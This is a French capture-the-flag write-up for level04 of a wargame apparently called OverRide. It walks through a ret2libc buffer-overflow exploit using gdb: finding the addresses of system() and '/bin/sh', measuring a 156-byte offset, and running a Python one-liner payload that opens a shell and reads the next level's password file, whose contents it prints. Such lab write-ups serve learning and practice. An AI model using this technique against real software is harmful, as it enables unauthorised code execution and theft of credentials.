source: https://beta.hackndo.com/retour-a-la-libc/

Dans un premier temps j'ai essaye de lancer le shell via le shellcode execv("/bin/sh"). Cependant le programme nous refuse l'execusion de cette commande.
Pour contourner cette protection il nous faudra executer le shell via la command system de la libc

en suivant le tutoriel au dessus il nous faut mettre la pile dans cet etat pour pouvoir lancer un shell a l'aide de la command system
[ buffer permettant d'atteindre l'overflow ] [ Adresse system() ] [ Adresse retour ] [ Adresse "/bin/sh" ]

Il nous faut donc trouver l'adresse de system ainsi que l'adresse de "/bin/sh"

(gdb) b main
Breakpoint 1 at 0x80486cd
(gdb) run
Starting program: /home/users/level04/level04

Breakpoint 1, 0x080486cd in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e6aed0 <system>



(gdb) find __libc_start_main,+9999999,"/bin/sh"
0xf7f897ec
warning: Unable to access target memory at 0xf7fd3b74, halting search.
1 pattern found.
(gdb) x/s 0xf7f897ec
0xf7f897ec:	 "/bin/sh"


il nous faut maintenant obtenir la taille de la chaine de caractere a rentrer pour obtenir le buffer overflow
(gdb) x/60 $esp
0xffffd630:	0xffffd650	0x00000000	0x00000000	0x00000000
0xffffd640:	0x00000b80	0x00000000	0xf7fdc714	0x00000000
0xffffd650:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd660:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd670:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd680:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd690:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd6a0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd6b0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd6c0:	0x00004141	0x00000000	0x00000000	0x00000000
0xffffd6d0:	0xf7feb620	0x00000000	0x00000000	0x00000000
0xffffd6e0:	0xf7fceff4	0x00000000	0x00000000	0xf7e45513 <-- EIP

taille : 156

une fois c'est different element recuperer il nous suffit donc d'ecrire :

level04@OverRide:~$ cat <(python -c 'print("A" * 156 + "\xd0\xae\xe6\xf7" + "\x90\x90\x90\x90" + "\xec\x97\xf8\xf7")') - | ./level04
Give me some shellcode, k
cat /home/users/level05/.pass
3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN